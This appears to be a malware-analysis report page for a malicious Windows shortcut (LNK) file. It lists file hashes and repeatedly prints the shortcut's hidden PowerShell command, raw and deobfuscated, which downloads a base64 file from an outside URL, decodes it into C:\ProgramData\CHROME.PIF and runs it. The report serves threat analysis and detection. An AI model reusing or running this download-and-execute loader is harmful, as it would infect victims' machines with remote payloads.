Malicious

eb7ea88f4712635b3ea3d6c625f4eda5

LNK File
|
MD5: eb7ea88f4712635b3ea3d6c625f4eda5
|
Size: 202.62 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	eb7ea88f4712635b3ea3d6c625f4eda5
Sha1	e367cce6bedb5c8b9520d6fe6c2491429a2df792
Sha256	4308a4f09494d5d09cb8383c8032c665267d9c88d12c54e3a6ebbbed820df9f5
Sha384	27dc9aea417e6d6c3c3dda30b87c5a967f24fdf07c8ed36582ef5c19fa403dedba51d293df4046c563d601d072bfbdbc
Sha512	c432771da0bfb2f9f23425065ed7f07f6584357cee3eab0f74b832abcb9b48d06d610868b9fe4022abde5687186b9be74eb8cca879e2d10201c5c4ec27113db9
SSDeep	6144:f8rIj7VWxxoeCe7bizap98IfiajB+XhaOgKDwQj6nY:fyIHsxxoeCe/izaAIqSB+xaON4Y
TLSH	1314F145DB262FDEFD3906FC095F5A0988CC5C322D21D4EB9A8F128B4114AD955B392F

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V','C:\\ProgramData\\HEW.GIF'); $file = 'C:\\ProgramData\\HEW.GIF'; [System.Convert]::FromBase64String((Get-Content $file)) \| Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIF;
Deobfuscated PowerShell	-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
Deobfuscated PowerShell	-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
Deobfuscated PowerShell	(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
Deobfuscated PowerShell	(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"

eb7ea88f4712635b3ea3d6c625f4eda5 (202.62 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V','C:\\ProgramData\\HEW.GIF'); $file = 'C:\\ProgramData\\HEW.GIF'; [System.Convert]::FromBase64String((Get-Content $file)) \| Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIF; Malicious	eb7ea88f4712635b3ea3d6c625f4eda5
Deobfuscated PowerShell	-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF" Malicious	eb7ea88f4712635b3ea3d6c625f4eda5 > LNK CommandLine
Deobfuscated PowerShell	-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF" Malicious	eb7ea88f4712635b3ea3d6c625f4eda5 > LNK CommandLine > [Deobfuscated PS]
Deobfuscated PowerShell	(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF" Malicious	eb7ea88f4712635b3ea3d6c625f4eda5 > LNK CommandLine > [PowerShell Command]
Deobfuscated PowerShell	(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF" Malicious	eb7ea88f4712635b3ea3d6c625f4eda5 > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙